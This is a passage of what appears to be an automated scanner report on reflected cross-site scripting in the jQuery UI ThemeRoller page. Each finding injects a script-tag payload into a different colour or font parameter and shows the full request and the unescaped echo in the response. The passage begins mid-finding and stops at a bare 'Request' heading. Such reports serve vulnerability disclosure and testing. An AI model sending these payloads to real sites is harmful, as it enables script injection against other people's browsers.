Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bb1d"><script>alert(1)</script>de8f868a8ad was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=2222224bb1d"><script>alert(1)</script>de8f868a8ad&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:21:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=2222224bb1d"><script>alert(1)</script>de8f868a8ad&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover
...[SNIP]...

1.109. http://jqueryui.com/themeroller/ [fcDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18b11"><script>alert(1)</script>a2e8a91da20 was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e18b11"><script>alert(1)</script>a2e8a91da20&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:22:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
acityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e18b11"><script>alert(1)</script>a2e8a91da20&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_
...[SNIP]...

1.110. http://jqueryui.com/themeroller/ [fcError parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9534a"><script>alert(1)</script>e23bebcd3cd was submitted in the fcError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a9534a"><script>alert(1)</script>e23bebcd3cd&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:25:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a9534a"><script>alert(1)</script>e23bebcd3cd&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&
...[SNIP]...

1.111. http://jqueryui.com/themeroller/ [fcHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef18f"><script>alert(1)</script>cbc15d48ea3 was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffffef18f"><script>alert(1)</script>cbc15d48ea3&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:21:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffffef18f"><script>alert(1)</script>cbc15d48ea3&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextu
...[SNIP]...

1.112. http://jqueryui.com/themeroller/ [fcHighlight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70142"><script>alert(1)</script>0a19df9f4d8 was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=36363670142"><script>alert(1)</script>0a19df9f4d8&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:24:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Active=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=36363670142"><script>alert(1)</script>0a19df9f4d8&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_fl
...[SNIP]...

1.113. http://jqueryui.com/themeroller/ [fcHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8284"><script>alert(1)</script>59c021d2b9b was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987e8284"><script>alert(1)</script>59c021d2b9b&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:23:21 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987e8284"><script>alert(1)</script>59c021d2b9b&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHig
...[SNIP]...

1.114. http://jqueryui.com/themeroller/ [ffDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69603"><script>alert(1)</script>617b0eaff01 was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif69603"><script>alert(1)</script>617b0eaff01&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:20:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120176

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif69603"><script>alert(1)</script>617b0eaff01&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorCont
...[SNIP]...

1.115. http://jqueryui.com/themeroller/ [fsDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80f4c"><script>alert(1)</script>634ec3d6ef was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em80f4c"><script>alert(1)</script>634ec3d6ef&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:20:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120173

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em80f4c"><script>alert(1)</script>634ec3d6ef&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_
...[SNIP]...

1.116. http://jqueryui.com/themeroller/ [fwDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a441"><script>alert(1)</script>e8b3746f1f8 was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold4a441"><script>alert(1)</script>e8b3746f1f8&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 16 Nov 2010 00:20:21 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120111

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold4a441"><script>alert(1)</script>e8b3746f1f8&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTe
...[SNIP]...

1.117. http://jqueryui.com/themeroller/ [iconColorActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14d79"><script>alert(1)</script>6fce8723dd7 was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

